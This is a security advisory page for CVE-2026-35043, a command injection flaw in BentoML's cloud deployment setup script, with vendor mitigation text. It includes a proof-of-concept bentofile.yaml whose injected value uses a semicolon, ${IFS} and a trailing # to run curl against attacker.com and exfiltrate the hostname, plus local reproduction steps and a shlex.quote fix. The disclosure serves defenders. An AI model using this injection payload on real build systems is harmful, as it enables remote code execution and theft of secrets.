CVE-2026-35043 — bentoml
HIGHCVE-2026-35043 is a high-severity (CVSS 7.8) OS Command Injection vulnerability in bentoml. A fix is available for bentoml — see the affected versions and patch details below.
BentoML: command injection in cloud deployment setup script (deployment.py)
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
- A successful exploit gives an attacker total control of the affected component, not partial access.
Exploitation and automatability from CISA’s SSVC triage for CVE-2026-35043.
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
How urgent is this, really
CVE-2026-35043 plotted by exploitation likelihood (EPSS) against impact (CVSS). The shaded corner — EPSS 50%+ and CVSS 7.0+ — is where this CVE doesn't sit, though severity or exploitability alone can still warrant action.
Where this sits among everything scored
Of 378,567 CVEs with a current EPSS score, this one falls in the < 10% band (highlighted). Real counts from FIRST.org, not a sample — log-scaled since the landscape is heavily right-skewed.
Real-World Exposure
bentomlReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Commit ce53491 (March 24) fixed command injection via system_packages in Dockerfile templates and images.py by adding shlex.quote. However, the cloud deployment path in src/bentoml/_internal/cloud/deployment.py was not included in the fix. Line 1648 interpolates system_packages directly into a shell command using an f-string without any quoting.
The generated script is uploaded to BentoCloud as setup.sh and executed on the cloud build infrastructure during deployment, making this a remote code execution on the CI/CD tier.
Details
Fixed paths (commit ce53491):
src/_bentoml_sdk/images.py:88- addedshlex.quote(package)src/bentoml/_internal/bento/build_config.py:505- addedbash_quoteJinja2 filter- Jinja2 templates:
base_debian.j2,base_alpine.j2, etc.
Unfixed path:
src/bentoml/_internal/cloud/deployment.py, line 1648:
def _build_setup_script(bento_dir: str, image: Image | None) -> bytes:
content = b""
config = BentoBuildConfig.from_bento_dir(bento_dir)
if config.docker.system_packages:
content += f"apt-get update && apt-get install -y {' '.join(config.docker.system_packages)} || exit 1\n".encode()
system_packages values from bentofile.yaml are joined with spaces and interpolated directly into the apt-get install command. No shlex.quote.
Remote execution confirmed:
- Line 905:
setup_script = _build_setup_script(bento_dir, svc.image)in_init_deployment_files - Line 908:
upload_files.append(("setup.sh", setup_script))uploads to BentoCloud - Line 914:
self.upload_files(upload_files, ...)sends to the remote deployment - The script runs on the cloud build infrastructure during container setup
Second caller at line 1068: _build_setup_script is also called during Deployment.watch() for dev mode hot-reload deployments.
Proof of Concept
bentofile.yaml:
service: "service:svc"
docker:
system_packages:
- "curl"
- "jq;curl${IFS}http://attacker.com/rce?d=$(cat${IFS}/etc/hostname)${IFS}#"
Generated setup.sh:
apt-get update && apt-get install -y curl jq;curl${IFS}http://attacker.com/rce?d=$(cat${IFS}/etc/hostname)${IFS}# || exit 1
The semicolon terminates the apt-get command. ${IFS} is used for spaces (works in bash, avoids YAML parsing issues). The # comments out the trailing || exit 1. The injected curl exfiltrates the hostname of the build infrastructure to the attacker.
Impact
A malicious bentofile.yaml achieves remote code execution on BentoCloud's build infrastructure (or enterprise Yatai/Kubernetes build nodes) during deployment. Attack scenarios:
- Supply chain: A shared Bento from a public model hub contains a poisoned
bentofile.yaml. When deployed to BentoCloud, the injected command runs on the build infrastructure. - Insider threat: A data scientist with deploy permissions injects commands into
system_packagesto exfiltrate secrets from the build environment (cloud credentials, API keys, other tenants' data). - CI/CD compromise: The build infrastructure typically has access to container registries, artifact storage, and deployment APIs, making this a pivot point for broader infrastructure compromise.
Local Reproduction Steps
Tested and confirmed on Ubuntu with BentoML source at commit 0772581.
Step 1: Create a directory with a malicious bentofile.yaml:
mkdir /tmp/bento-pwn
cat > /tmp/bento-pwn/bentofile.yaml << 'EOF'
service: "service:svc"
docker:
system_packages:
- "curl"
- "jq; touch /tmp/PWNED_BY_INJECTION #"
EOF
Step 2: Generate the setup script using the vulnerable code path (extracted from deployment.py:1648):
python3 -c "
import yaml
with open('/tmp/bento-pwn/bentofile.yaml') as f:
config = yaml.safe_load(f)
pkgs = config['docker']['system_packages']
script = f\"apt-get update && apt-get install -y {' '.join(pkgs)} || exit 1\n\"
print('Generated setup.sh:')
print(script)
with open('/tmp/bento-pwn/setup.sh', 'w') as f:
f.write(script)
"
Step 3: Execute and verify:
rm -f /tmp/PWNED_BY_INJECTION
bash /tmp/bento-pwn/setup.sh
ls -la /tmp/PWNED_BY_INJECTION
Result: /tmp/PWNED_BY_INJECTION is created, confirming the injected touch command executed. The semicolon broke out of apt-get install, the injected command ran, and # commented out the error handler.
Generated setup.sh content:
apt-get update && apt-get install -y curl jq; touch /tmp/PWNED_BY_INJECTION # || exit 1
For comparison, the fixed version (with shlex.quote) would generate:
apt-get update && apt-get install -y curl 'jq; touch /tmp/PWNED_BY_INJECTION #' || exit 1
The single quotes from shlex.quote neutralize the semicolon and hash, treating the entire string as a literal package name argument to apt-get.
Suggested Fix
Apply shlex.quote to each package name, matching the fix in images.py:
if config.docker.system_packages:
quoted = ' '.join(shlex.quote(p) for p in config.docker.system_packages)
content += f"apt-get update && apt-get install -y {quoted} || exit 1\n".encode()
— Koda Reef
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | bentoml | all versions | 1.4.38pip install --upgrade 'bentoml==1.4.38' |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for bentoml, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update bentoml to 1.4.38 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2026-35043 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 Security's impact-aware SCA analyses which vulnerable code paths your application actually calls, so a match like CVE-2026-35043 can be triaged on real exposure rather than presence alone.
Tailored to CVE-2026-35043. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is CVE-2026-35043 in your dependencies?
O3 Security finds CVE-2026-35043 across PyPI dependencies, including transitive ones, and its impact-aware SCA ranks findings by whether your code actually calls the vulnerable path.